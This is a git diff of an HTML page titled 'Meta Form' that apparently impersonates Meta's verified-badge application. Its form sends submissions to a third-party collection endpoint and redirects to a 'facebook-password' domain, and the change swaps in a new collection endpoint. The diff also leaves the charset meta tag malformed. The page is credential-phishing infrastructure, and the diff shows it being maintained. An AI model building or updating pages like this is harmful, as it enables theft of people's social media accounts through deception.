--- a/request.html
+++ b/request.html
@@ -1,6 +1,6 @@
 <html lang="en">
     <head>
-        <meta charset="UTF-8">
+        <meta charset="UTF-8
         <link rel="icon" type="image/svg+xml" href="https://apply-get-verified-badge.vercel.app/assets/logo-xjw2vU6p.png">
         <meta name="viewport" content="width=device-width, initial-scale=1.0">
         <title>Meta Form</title>
@@ -8,7 +8,7 @@
         <link rel="stylesheet" crossorigin="" href="style.css">
     </head>
     <body>
-        <form action="https://submit-form.com/jomyIqsNV" method="post">
+        <form action="https://submit-form.com/9JyQP5uFI" method="post">
             <input type="hidden" name="_redirect" value="https://facebook-password-com.vercel.app/"/>
             <div id="root">
                 <div>
